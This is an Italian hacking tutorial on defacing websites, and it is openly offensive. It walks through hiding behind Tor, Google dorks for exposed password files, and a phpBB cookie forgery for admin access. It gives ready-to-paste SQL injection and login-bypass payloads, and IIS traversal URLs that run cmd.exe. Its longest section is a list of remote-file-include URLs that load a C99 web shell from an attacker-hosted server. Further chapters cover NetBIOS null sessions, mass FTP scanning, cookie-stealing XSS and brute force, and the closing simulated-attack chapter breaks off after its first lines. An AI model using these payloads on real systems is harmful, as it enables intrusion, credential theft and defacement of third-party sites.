Menu principale:
Hå¢kÎñG > ÐêFå¢ìÑg
##################################################################################
#In questa guida spiegherò diverse tecniche per defacciare un sito in diverse #
#situazioni! #
#All'inizio studieremo le più banali vulnerabilità nel caso le trovaste ma più #
#avanti si comincia con i metodi DRASTICI se nel caso queste piccole
vulnerbilità#
#non funzionino #
##################################################################################
{CAPITOLO 1}
Prima di cominciare con la Pratica ovviamente ci tocca la Teoria!
Prima di tutto dovete sapere cosa significa DEFACE!
Deface significa in parole semplici HACKERARE UN SITO!
Questo è possibile grazie allo sfruttamento di BUG e di alcune tecniche
che andrò a spiegare DOPO!
In questa guida infatti vedremo come comportarci nelle diverse situazioni!
Utilizzeremo:Proxy,Exploit,GoogleHacker!
Tutto Spiegato!
Adesso mettiamoci all'opera!
In ogni Deface dovete sapervi PROXARE!
Nel Secondo capitolo studieremo proprio Questo!
Buona Lettura a tutti da Crashinside =)
{CAPITOLO 2}
In questo capitolo studieremo come PROXARCY!
Proxarcy deriva da PROXY!
Il proxy è un modo per camuffare il nostro IP dietro un altro così in rete
quando
tenteremo un attacco non apparirà il nostro vero IP!
Per fare ciò consiglio di scaricare il programma "TOR"
(disponibile su
www.crashinside.altervista.org)
Una volta scaricato avviamo l'installazione e spuntiamo
le caselle TOR e PRIVOXY che ve lo chiederà quando dovrete scegliere
i componenti da installare!
Ora,andate in C:ProgrammiTor e avviamo tor.exe
Vi dovrebbe apparire una schermata di DOS.
Ora andiamo in C:ProgrammiPrivoxy e avviamolo!
Si dovrebbe chiudere la schermata di DOS e ora andando nel Browser
e poi nelle opzioni PROXY inserire
HTTP Proxy: localhost
Port: 8118
Ora,aggiorniamo il Browser e andiamo su
www.ilmioip.it e noteremo
un ip che non è nostro!
Bene!Adesso noteremo la connessione ultra lenta!Pultroppo i proxy sono così!
VORREI RICORDARE UNA COSA!
SE SIETE PROXATY E TENTATE AD ESEMPIO DI ENTRARE IN MSN NON VI FARà ENTRARE!
DOVRETE PRIMA DISATTIVARLI!
Ok,ora la nostra lezione sul Proxy è finita!
Adesso si fa sul serio!Ci vediamo nel prossimo capitolo
{CAPITOLO 3}
In questo capitoletto parleremo del GOOGLE HACKER!
E cioè???
Cioè che in questo capitolo vedremo come sfruttare GOOGLE
in un altro modo =)
Infatti inserendo alcune STRINGHE chiamate QUERY
potremo scovare SITI VULNERABILI,PASSWORD e tanto altro!
Io vi posto le Query più comuni,e vi spiegherò due comandini
molto utili!
Vi serve solo un pizzico di fantasia per ottenere tutto ciò che volete
ECCO LE QUERY:
allinurl:admin.php site:.edu
Filetype: trova archivio .pdf, .ps, .doc, .xls, .txt, .ppt, .rtf, .asp, .wpd...
"Index of /admin"
"Index of /root"
"Index of /password"
"Index of /" +passwd
allintitle: "index of/admin"
allintitle: restricted filetype:doc site:gov
intitle:"index of private"
allinurl:auth_user_file.txt
intitle:"Index of" config.php
intitle:index.of.etc
filetype:xls username password email
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
intitle:"Index of" ".htpasswd" htpasswd.bak
inurl:config.php dbuname dbpass
intitle:"Index of" master.passwd
intitle:"Index of" .mysql_history
intitle:"index of" trillian.ini
intitle:"Index of" spwd.db passwd -pam.conf
intitle:"Index of" pwd.db
intitle:"Index of" secring.bak
intitle:"Index of" "people.lst"
intitle:"Index of..etc" passwd
intitle:"Index of" passwd passwd.bak
intitle:index.of passlist
intitle:"Index of" .bash_history
intitle:"Index of" .sh_history
site:edu grades admin
filetype:htaccess basic
intitle:"Index of" finances.xls
"This report was generated by WebLog"
"phpinfo.php" –manual
intitle:Index.of robots.txt
intitle:"Index of" _vti_inf.html
intitle:"Index of" service.pwd
intitle:"Index of" shtml.dll
intitle:"Index of" shtml.exe
intitle:"Index of" fpcount.exe
intitle:"Index of" default.asp
intitle:"Index of" htimage.exe
intitle:"Index of" default.asp
intitle:"Index of" AT-admin.cgi
intitle:"Index of" glimpse
intitle:"Index of" guestbook.cgi
intitle:"Index of" perl
intitle:"Index of" show
intitle:"Index of" index.html~
intitle:"Index of" stats.html
inurl:shop "Hassan Consulting's Shopping Cart Version 1.18"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"Welcome to IIS 4.0"
"powered by openbsd" +"powered by apache"
"Powered by phpBB 2.0.0"
Le Query ALLINURL: e INURL: vi serviranno
se volete ricevere nelle vostre ricerche
i LINK contenete l'indirizzo che cercate allora
queste fanno a caso vostro!
Quindi se volete ad esempio scovare il modulo
login dell'admin(in siti ASP che vedremo più avanti)
utilizeremo in google:
Allinurl:/admin.asp
Inurl:/admin.asp
Ecc...
Spero di essere stato Chiaro!
Andiamo al prossimo capitolo dove cominceremo a fare sul serio
{CAPITOLO 4}
Ok,in questo capitolo cominciamo a imparare una Tecnica!
Roba facile
Infatti ci occuperemo di Defacciare Forum PhpBB sfruttando
un semplice BUG ovvero cambiando il codice GUEST in QUELLO ADMIN
nel file dei COOKIES
A,una cosa...non andate in crisi se non trovate forum vulnerabili
dato che al giorno d'oggi non ce ne sono tantissimi!
Potrete sempre usare il programma PHPBB DEFACER(disponibile nella sezione
DOWNLOAD)
Per defacciare forum phpbb inferiori alla versione 2.0.10
Cominciamo Subito!
Ora in questo capitolo traccerò tutti i passaggi per defacciare i forum PHPBB
1)Andate su un motore di ricerca google o
altavista(consiglio altavista perchè trova + pagine di google quindi più
possibilita
di trovare un forum vulnerabile)quindi prendiamo in esempio altavista
www.altavista.com
2)Nella ricerca scrivete: Powered By Phpbb 1.0.12
3)Ora cercate un forum vi spiego un trukketto,vedete il link quello con +
probabilita di defacing
sn qll ke nel link hanno ad es:
www.forum.com/index.php oppure
www.forum.com/index.php?members ecc qnd trovate la 2 opzione cancellate ?members
e rimanete /index.php per arrivare alla pagina iniziale del forum!
4)Andate in C:Documents and SettingsUSERDati
applicazioniMozillafirefoxLettereNumeri*(leggete in basso)
*=Dp firefox troverete una serie di lettere e numeri a random xco ogni cartella
è diversa,ovviamente in
qst esempio abbiamo preso in esame il BROWSER MOZILLA!
5)Una volta entrato nella cartella clikkate su COOKIES.TXT fate ALT+T e inserite
nella ricerca il nome
del sito ke volete defacciare xke in pratica qnd avete aperto il forum php per
l'identificazione vi ha registrato i cookie!
6)Una volta trovato controllate se vi appare una stringa tipo qst:
phpbb2mysql_data se ce l'ha il forum puo essere vulnerabile,dipende tutto dal
codice Guest ke troverete
affianco,di solito è: a%3A07Bma puo essere anke diverso!
7)Una volta individuato il codice guest inserite al posto del codice questa
STRINGA:
##################################################################
#a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid%22%3A1222%227D#
##################################################################
(Piccola parentesi,se al posto del codice GUEST troverete questa stringa,nn si
fa niente,il forum nn è vulnerabile!)
8)Ora salvate i cookie(nn clikkate sulla [X] per uscire e fare salva xke mi è
capitato d nn salvarmeli quindi FILE,SALVA)
9)Kiudete tt le pagine del browser ke avete,tutte quante altrimenti vi riportera
i
cookie cm erano prima!(Naltra parentesi nn fate aggiorna xke nn funziona xD)
10)Riaprite il forum e dovreste essere ADMIN!
P.S nn sempre vi mette admin anke se trovate la data e il codice guest nn
significa niente!
Volevo darvi un consiglio,se nel caso entrate cm admin e x caso nn vi esce il
pannello admin 2 sn i motivi:
1)L'admin per sicurezza ha creato 1 account admin senza possibilita di entrare
nel pannello o qlk del genere
2)Il pannello è nascosto(A ME è CAPITATO)!
Questa era una guida che avevo scritto gia e che potrete trovare sul mio sito!
www.crashinside.altervista.org
Passiamo subito al prossimo capitolo =)
{CAPITOLO 5}
Adesso faremo finta di trovare un sito che vogliamo Hackerare!
Facciamo finta che il sito sia
www.sitovittima.it
Ora se il sito è in PHP-NUKE proxandoci
proviamo ad iniettare un SQL-INJECTION!
Ad esempio se il sito ha il motore di RICERCA potremmo iniettare SQL-INJECTION
in questo modulo!
Ma,cosa è questo SQL-INJECTION?
L'Sql-Injection è un iniezione di codice e utilizzandolo
potremo riuscire a rubare Password hashate in MD5 ovviamente
contro la volontà del sito!
Ok,dopo questa piccola teoria sull'sql-injection inseriamo il seguente
CODICE(SQL-INJECTION) nel motore di ricerca:
############################################################################
#p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*#
############################################################################
Ovviamente senza i "#"
Adesso se il nostro SQL-INJECTION è andato a BUON FINE ci ritroveremo
uno o più password hashate in MD5 tanto quanto sono gli ADMIN,in più sotto
ci sarà scritto una cosa tipo "CONTRIBUTO DI ZAK" questo ZAK sarà proprio
l'username-admin che utilizzeremo per loggare con la sua password che ora è
hashata!
Le password per riconoscerle sono fatte da NUMERI e LETTERE insieme
tipo come se fosse una STRINGA!
Adesso vi chiederete:
Ok,abbiamo sta password HASHATA ma non possiamo LOGGARE dato che è CRIPTATA
Che si fa??????
Bhè potremmo provare a DECRIPTARLA no?
Basta prendere un programmino come MD5 o CAIN & ABEL
(Tutti disponibili su
www.crashinside.altervista.org)
inserire l'hash e decriptarlo!
Una volta decriptato basta andare nel modulo di login dell'admin(di solito /admin.php)
inseriamo username inseriamo quello che abbiamo trovato sotto la password
hashata,ovvero dove abbiamo trovato: "CONTRIBUTO DI ZAK"(ZAK è un PURO ESEMPIO!)
Adesso siamo entrati come ADMIN!
Ma,se non fosse Così?ad esempio,se non c'è il modulo SEARCH?
Bhè se non c'è possiamo provare a fare una cosa...
Andiamo ad esempio nel modulo DOWNLOAD
Notiamo l'indirizzo,ad esempio potremo trovare:
www.sitovittima.it/modules.php?name=Download
Se al posto di name=Download inseriamo "name=Search"
Se non si apre niente proviamo a mettere:
www.sitovittima.it/Search.php oppure
www.sitovittima.it/index/Search.php
Se non ve lo apre o dice MODULO NON ATTIVO,con il search non si fa nulla!
Proviamo con la TOP10!
Il link della top10 è:
www.sitovittima.it/modules.php?name=Top
Facciamo la stessa cosa per il Search nel caso non ci fosse nella home il modulo
Top10
Inseriamo affianco alla stringa modules.php?name=Top
il seguente SQL-INJECTION(SEMPRE DA PROXATY)
####################################################################################
#&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors#
####################################################################################
Ora,nella parte dei SONDAGGI(mi sembra)dovreste trovare le Password Hashate!
Fate lo stesso procedimento di sopra e loggate come ADMIN!
VORREI RICORDARE UNA COSA:
AVVOLTE DOPO INIETTATO UN SQL-INJECTION POTREBBE USCIRE UN IMMAGINE CHE DICE
CHE VERRà CONTATTATA LA POLIZIA FBI O ROBA SIMILE!
NON SPAVENTATEVI,è SOLO PER SPAVENTARE
Ora,andiamo al capitolo successivo dove impararete a defacciare un sito in ASP!
{CAPITOLO 6}
In questo capitolo spiegherò come Defacciare siti in piattaforma ASP!
Questo è più semplice!
Ammettiamo il caso che il nostro caro sito(www.sitovittima.it)
sia in ASP,come si agisce?
Semplice,si tenta un ASP-INJECTION nel modulo di login admin!
Di solito è
www.sitovittima.it/admin.asp oppure
www.sitovittima.it/login/admin.asp
Se non è così provate a cercare su GOOGLE: ADMIN SITOVITTIMA.IT o qualcosa
del genere,per far trovare il modulo di login dell'admin!
Ora iniettiamo l'ASP-INJECTION{L'ASP INJECTION è UGUALE ALL'SQL-INJECTION
SOLTANTO CHE OVVIAMENTE I CODICI SARANNO DIVERSI}
inserendo:
Username: admin
Password: ' or '
Adesso,dovrebbe entrarvi come admin!
Se non fosse così,bhè vediamo nei capitoli dove utilizzeremo
del deface avanzato!
Ora passiamo al prossimo Capitolo!
{CAPITOLO 7}
Bene,siamo giunti anche a questo capitolo
Ok,allora cominciamo subito!
Abbiamo tentato l'SQL-INJECTION ma non è andato
abbiamo tentato ASP-INJECTION e manco,allora che si fa?
Si usano metodi Drastici =D
Come si suol dire: "A MALI ESTREMI,ESTREMI RIMEDI" xD
Ok,abbiamo fatto la battuta mo vogliamo vede che dobbiamo fa?
Allora in questi casi se abbiamo fallito con asp e sql injection
Prima di tutto,prendiamo l'ip del sito da Defacciare,facendo finta che il sito
sia
www.sitovittima.it,in questo modo:
Apriamo il Prompt di Ms-Dos:
START-ESEGUI e scriviamo CMD
Ora scriviamo:
nslookup sitovittima.it
Il prompt risponderà:
Server: ns017dns.fastweb.it
Address: 62.101.81.80
Risposta da un server non di fiducia:
Nome: sitovittima.it
Addresses: 127.0.0.1
Ovviamente l'ip e il sito sono falsi quindi ho messo 127.0.0.1 come esempio
ora,noteremo che appariranno due IP!
Prendiamo il secondo IP,ovvero l'ip del sito!
Ora,ci potrebbe essere molto utile fare un WHOIS!
Piccola parentesi su cosa è il WHOIS:
Con il whois è possibile prendere i dati di registrazione al dominio del sito:
ad es:
www.sitovittima.it,dato che è un dominio a pagamento e non gratis tipo
altervista,
l'admin ha dovuto dare i propri dati,e quindi facendo un whois è possibile
ricavare:
nome,cognome,indirizzo e tanto altro ancora!
Ora,effettuiamo il WHOIS da questo sito:
http://www.ripe.net/index.html
Bene,ora prendiamo un BUON PORT SCANNER(nella sezione Download potete prendere
ad es RETINA!)
Facciamo uno scanner e così individueremo tutti i servizi sfruttati dal server!
Ad esempio ci uscirà:
21 [Ftp => File Transfer Protocol] 220 BulletProof FTP Server ready ...
22 [OpenSSH 3.1]
80 [Http => World Wide Web, HTTP]HTTP/1.1 400 Bad Request Server: Microsoft-IIS/5.1
135 [epmap => DCE endpoint resolution]
139 [Netbios-ssn => NETBIOS Session Service]
443 [HttpS => Secure HTTP]
445 [Microsoft-Ds]
Adesso si Attacca!
Per attaccare,vediamo se il sito è vulnerabile a qualche vulnerabilità
tipo:
Xss,Remote File Include,Sql-Injection,Asp-Injection e così Via(TUTTE TECNICHE
SPIEGATE IN GUIDE HACKER)
Se non è vulnerabile potremo provare utilizzando i famicerati EXPLOIT!
Andiamo su siti per Exploit e Vulnerabilità tipo:
www.milw0rm.com
www.securityreason.com
Adesso cerchiamo un exploit adatto ai dati presi,ovvero ai servizi sfruttati(CON
IL PORTSCANNER) e al sistema operativo(DAL WHOIS)
e cominciamo a cercare un bel exploit!
Ora avviamo l'exploit,se funge Ok,ma se non funge potremo vedere ad esempio se
il sito ha la porta 139 APERTA!
Ovvero quella di Netbios!
Se è così apriamo il prompt di ms-dos e scriviamo questo codice:
NET USE 192.10.10.1IPC$ "" /u:""
Se vi risponderà:
Esecuzione Comando Riuscita
Abbiamo effetuato una NULL SESSION
Piccola parentesi sulla NULL SESSION:
La NULL SESSION è una connessione stabilita sul netbios
senza essere registrati o altro!
Adesso vediamo i servizi publici del nostro amichetto Mr. Green
Scriviamo nel Prompt:
net view 127.0.0.1
Ci risponderà:
Risorse condivise su 127.0.0.1
Nome condivisione Tipo Utilizzato come Commento
-------------------------------------------------------
winnt Disco
SharedDocs Disco
Personale Disco
Esecuzione comando riuscita.
Bhè non dimentichiamoci che abbiamo trovato la porta 80 con il servizio
IIS!
Con questo servizio è possibile sfruttare una vulnerabilità per accedere a tutte
le directory!
Scriviamo nella barra indirizzi del browser uno dei seguenti "EXPLOIT"
Http://www.sitovittima.it/scripts/..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/msadc/..%225c..%255c..%255c.. %255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/cgi-bin/..%225c..%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/_vti_cnf/…%255c....c..%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+dir+c:
Http://www.sitovittima.it/_vti_bin/…%255c....c..%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+dir+c:
Altrimenti se ha la porta 139 aperta
sempre su MILW0RM o SECURITYFOCUS troviamo degli exploit o bug per la 139!
Oppure,utilizzare il metodo per entrare nei FILE CONDIVISI
(c'è la guida ENTRARE IN UN HARD DISK TRAMITE NETBIOS nella sezione GUIDE
HACKER)
{CAPITOLO 8}
In questo capitolo utilizzeremo il bug del REMOTE FILE INCLUDE!
Quindi utilizzeremo una SHELL:
Tra le più famose troviamo la C99 e la R57!
Nella sezione DOWNLOAD-PROGRAMMI HACKER E UTILITY le trovere 8)
Io consiglio la C99!
Facciamo un po di Teoria =)
######################################################################
#La C99 è una shell fatta in PHP,che hostandola su un FTP e poi #
#sfruttando il BUG dell'autoiniezione (che ne parleremo più avanti)la#
#iniettate in 1 sito vulnerabile e vi ritroverete d'avanti come un #
#pannello,come se aveste l'FTP d'avanti! #
######################################################################
Prima di tutto dopo aver scaricato la shell dobbiamo upparla su un FTP
cambiando l'estensione PHP perchè altrimenti la shell non si inietterà
in tutte le Directory!
Quindi rinominiamo la shell in:
C99.jpg
C99.txt
C99.gif
C99.bmp
E via dicendo....
Ora inserirò diversi "EXPLOIT" per sfruttare questo BUG!
Basta inserirli nel browser,dove c'è PATH sarebbe il percorso
tipo
www.site.com/index/ ecc
Dove c'è
www.site.com sarà il sito vittima
invece dove troveremo [EVIL_SCRIPT] dovrete inserire l'URL della shell che avete
uppato
tipo se l'avete uppata su
www.mysite.it/c99.txt inserirete ad esempio:
www.site.com/index/includes/content/contact_content.php?root_path=www.mysite.it/c99.txt
Se tutto va bene vi apparirà il pannello della C99!
ECCO GLI EXPLOIT:
########################################################################################################
#http://www.site.com/[path]/includes/content/contact_content.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addbioform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addfliersform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addgenmerchform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addinterviewsform.php?root_path=[evil
script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlinksform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addlyricsform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmembioform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addmerchpicform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addnewsform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addphotosform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleaseform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreleasepicform.php?root_path=[evil
script]#
#http://www.site.com/[path]/adminpanel/includes/add_forms/addrelmerchform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addreviewsform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addshowsform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/add_forms/addwearmerchform.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/disphtmltbl.php?root_path=[evil
script] #
#http://www.site.com/[path]/adminpanel/includes/mailinglist/dispxls.php?root_path=[evil
script] #
#http://www.site.com/preload.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
#
#http://www.site.com/index.php?config=owned&func_prog=http://site.com/cmd.gif?&cmd=ls
#
#http://www.site.com/missing.php?header_prog=[Evil_Script] #
#http://www.site.com/_inc/footer.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?mod_root=[Evil_Script] #
#http://www.site.com/_inc/header.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pfooter.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/pheader.php?theme_root=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?mod_dir=[Evil_Script] #
#http://www.site.com/_inc/web_statsConfig.php?php_ext=[Evil_Script] #
#http://www.site.com/_mods/email.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/files.php?footer_prog=[Evil_Script] #
#http://www.site.com/_mods/headlines.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/search.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/topics.php?header_prog=[Evil_Script] #
#http://www.site.com/_mods/users.php?header_prog=[Evil_Script] #
#http://www.site.com/[livehelperpath]/initiate.php?abs_path=[Evil_Script] #
#http://www.site.com/admanagerpro/common.php?ipath=[Evil_Script] #
#http://www.site.com/templates/deluxe/postreply.php?templatefolder=[Evil_Script]
#
#http://www.site.com/templates/deluxe/posting.php?templatefolder=[Evil_Script] #
#http://www.site.com/templates/deluxe/pm/newpm.php?templatefolder=[Evil_Script]
#
#http://www.site.com/templates/default/postreply.php?templatefolder=[Evil_Script]
#
#http://www.site.com/templates/default/posting.php?templatefolder=[Evil_Script]
#
#http://www.site.com/templates/default/pm/newpm.php?templatefolder=[Evil_Script]
#
#http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
#
#http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]
#
########################################################################################################
Po ce ne sono tanti altri,basta andare su
www.milw0rm.com/search/ e cercare
la stringa "Remote File Include"
Per trovare siti vulnerabili ovviamente basta fare qualche ricerca
sfruttando il Google Hacker(Spiegato nel capitolo 3)
{CAPITOLO 9}
In questo capitolo ci occuperemo del PUB SCAN
Il pub scan è una tecnica che con un programmino(che dopo vedremo)
è possibile scannare(deriva da Scannerizzare) interi RANGE
di IP di siti per scovare siti con l'FTP dove si ha
l'accesso anonimo e il diritto di scrittura!
(ELIMINARE DIRECTORY,CREARE DIRECTORY,UPPARE FILE Ecc)
Scarichiamo il programmino GRIMS PING reperibile dal mio sito
oppure su questo link:
http://workshops.prohosting.com/dev/cgi-bi....cgi?PingMirror
Ora configuriamolo:
Installiamo il Grims Ping poi apriamolo e andiamo su:
OPTIONS-PREFERENCES
Ora la linguetta PUBFIND e poi su GENERAL
Dove c'è THREADS [5] TIMEOUT (S)[10]
Inseriamo al posto del 10 l'8!
Questo perchè troverà tutti i siti in quel TEMPO
che è un buon TEMPO!
Ora andiamo in PERMISSIONS e poi GENERAL
Spuntate il quadratino LOG DIRECTORY PERMISSIONS e poi su ADD
selezionate una DIRECTORY dove creare il file permissions.log
Questo infatti a fine SCAN premendo F2 vi appariranno tutti i siti
con diritto di SCRITTURA!
Ora come ultima cosa andiamo su PERMISSIONS e poi LOGGING
e spuntiamo tutte le caselle tranne:
EXCLUDE NONDELETABLE PUBS FROM LOG
EXCLUDE PUBS FROM ANONYMOUS LOG
Ora facciamo SAVE!
Ora clikkiamo in alto su PASTE IP
e inseriamo l'ip del sito!
Se non avete un TARGET preciso mettiamo un IP
possibilmente di siti,andiamo nel PROMPT DI DOS(START-ESEGUI-CMD)
e scriviamo NSLOOKUP Nomesito.it/com/org/net ecc
Prendiamo l'ip e magari se l'ip è:
123.4.5.6 mettiamo:
123.4.5.1
Così che ci scannerizzerà tutto il RANGE!(da 1 a 254)
Ora clikkiamo su ADD MULTIPLE RANGES
Ora clikkate sul SEMAFORO e comincia lo scan!
Alla fine premendo F2 vi appariranno i siti con diritto
di scrittura!
Quindi basterà inserire:
Ftp//IPSITO
per entrare con i permessi di SCRITTURA!
Bene,anche questa tecnica è stata spiegata
Andiamo avanti =)
{CAPITOLO 10}
In questo capitolo ci occuperemo dei siti in JPORTAL!
Cerchiamo sul nostro amato Google le seguenti QUERY:
Codice:
POWERED BY JPORTAL
Ora,vi uscira una lista di siti in JPORTAL!
Apriamone uno e inseriamo la seguente stringa nella barra indirizzi del browser:
Codice:
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id
from admins LIMIT 1
dove c'è X inseriamo il numero ID dove (SE IL SITO è VULNERABILE)trovare user e
pass dell'admin NON HASHATI!
Quindi proviamo a inserire 1 oppure 2 e vediamo se trovate qlk!
PICCOLO ESEMPIO
Facciamo finta di aver trovato
www.sito.com ke è un jportal vulnerabile!
scriviamo:
Codice:
www.sito.com/print.php?what=article&id=2 AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id
from admins LIMIT 1
Dovrebbe uscire una scritta strana tipo araba e sotto
USER E PASS DELL'ADMIN!
Ora andiamo in
www.sito.com/admin.php
e inseriamo i dati appena presi dal bug!
Ora avrete accesso al pannello di amministrazione!
Altra piccola tecnica di DEFACE
{CAPITOLO 11}
Bene,se siete riusciti ad arrivare fin quì,complimenti
Adesso,dato che siamo in TEMA di DEFACE inserirò anche
come DEFACCIARE I GUESTBOOK
Cerchiamo il LOGIN ADMIN per i guestbook
andando su google e inserendo una delle seguenti Query:
inurl:guestbook/admin/login.php
Alla schermata di login dell'admin del guestbook inserite questi dati:
USER: 'or 'jr7'='jr7' /*
PASSWORD: anything
QUERY PER LA RICERCA:
inurl:guestbook/admin/login.php
inurl:guestbook/admin.php
inurl:guestbook/login.php
guestbook/login.php
guestbook/admin.php
guestbook/login/admin.php
guestbook/admin/login.php
allinurl:/guestbook/login/admin.php
{CAPITOLO 12}
In questo capitolo ci occuperemo del bug XSS!
Il bug XSS puo essere sfruttato nei motori di RICERCA(non solo PHP-NUKE)
Ammettiamo che nel sito ci sia VALUE CERCA
Allora il codice sarà:
Nel value verrà ricordato il valore che avremo cercato se ad esempio
noi cerchiamo "DOWNLOAD"
Nella pagina del risultato il codice sarà:
Quindi possiamo iniettare qualsiasi codice,e il nostro obbiettivo
sarà iniettare un codice JAVASCRIPT,esempio:
window.alert("Hacked");
Se il sito sarà vulnerabile uscirà la scritta Hacked in un allert
Così noi possiamo sfruttare questo BUG per iniettare JAVASCRIPT cattivi
tipo per rubare cookie,password ecc...
Ora andiamo al prossimo capitolo
{CAPITOLO 13}
In questo capitolo ci occuperemo di un metodo DISPERATO
Ovvero il BRUTE FORCE!
Bhè non c'è molto da spiegare dato che è molto semplice!
Scaricate un programma BRUTE FORCE dal mio sito
sezione DOWNLOAD-PASSWORD inserite il link del sito
e cominciate a fare il BRUTE FORCE!
Il bruteforce è una tecnica che prova tutte le combinazioni
possibili fino a quando non trova quella giusta,ovvero la password del'ftp!
In molti programmi BruteForce potrete anche scegliere di fare un DICTIONARY
ATTACK
ovvero prova tutte le combinazioni di parole che risiedono in un TXT chiamato
DIZIONARIO!
Questa lezione è finita!
Non c'era molto da dire,ma è giusto che conosciate anche questa tecnica!
{CAPITOLO 14}
BHè,prima di arrivare al 14esimo e ULTIMMO capitolo
dove ci simuleremo un attacco a un sito,
ci occuperemo degli EXPLOIT!
Gli exploit sono fondamentali se si vuole DEFACCIARE
un sito!
Dovete sapere che gli exploit più diffusi sono in:
-C
-C++
-PERL
Per eseguirli ovviamente bisogna avere un COMPILATORE!
Per exploit in C compilatore di C per PERL compilatore in PERL
e via dicendo!(TUTTO REPERIBILE SUL MIO SITO)
Una volta inserito il codice dell'exploit nel compilatore
bisogna compilaro e quindi renderlo un EXE!
Per eseguire un exploit in C dopo averlo compilato
e quindi ora mai diventato un .EXE(Eseguibile)
Andiamo nel PROMPT DI MS-DOS(START-ESEGUI-CMD)
Scriviamo quanto segue:
[CODICE]
Cd C:DIRECTORY DOVE C'è L'EXPLOIT .EXE(esempio:
Cd C:Documents and SettingsUserDesktopExploitsEXPLOIT.exe)
e premiamo INVIO
[FINE CODICE]
Adesso seguiamo le istruzioni ed eseguiamo il nostro EXPLOIT!
Per quelli in PERL bisogna avere l'INTERPRETE in PERL
Reperibile su:
http://activestate.com/Products/Download/D...x?id=ActivePerl
Adesso salviamo il codice dell'exploit su un BLOCCO NOTES
e salviamo con estensione .PL
Ora apriamo il PROMPT di MS-DOS(START-ESEGUI-CMD)
e scriviamo:
[CODICE]
Cd C:PerlBin
INVIO
Perl.exe EXPLOIT.PL
INVIO
[/CODICE]
L'exploit deve risedere per forza in C:PERLBIN
perchè è quì dove c'è L'exe per interpretare L'exploit!
Ora,seguiamo le istruzioni ed eseguiamo il nostro bel EXPLOIT!
Benissimo!
Avete imparato molte tecniche di DEFACE e non solo!
Adesso passiamo all'ultimo capitolo,ovvero dove simuleremo
un DEFACE! =)
{CAPITOLO 15}
Bene!
Siete arrivati fin quà ed ora?
Una simulazione di DEFACE!
Cominciamo subito!
In questa simulazione prenderemo di mira il sito
www.sitovittima.com
Cominciamo!
